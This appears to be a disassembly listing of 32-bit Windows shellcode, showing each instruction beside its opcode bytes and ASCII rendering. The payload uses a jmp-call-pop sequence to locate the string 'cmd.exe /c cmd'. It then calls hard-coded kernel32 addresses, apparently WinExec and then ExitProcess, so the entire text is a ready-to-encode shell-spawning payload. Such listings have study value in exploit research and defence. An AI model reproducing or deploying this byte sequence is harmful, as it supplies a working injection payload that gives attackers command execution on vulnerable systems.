0x0        xor eax, eax                        \x31\xc0                  1.        
0x2        jmp 0x17                            \xeb\x13                  ..        

     label_0x4:
0x4        pop ebx                             \x5b                      [         
0x5        mov byte ptr [ebx + 0xe], al        \x88\x43\x0e              .C.       
0x8        push ebx                            \x53                      S         
0x9        mov ebx, 0x7c8623ad                 \xbb\xad\x23\x86\x7c      ..#.|     
0xe        call ebx                            \xff\xd3                  ..        
0x10       mov ebx, 0x7c81cafa                 \xbb\xfa\xca\x81\x7c      ....|     
0x15       call ebx                            \xff\xd3                  ..        
     label_0x17:
0x17       call 4                              \xe8\xe8\xff\xff\xff      .....     
0x1c       cmd.exe /c cmd ; string            \x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x6d\x64          
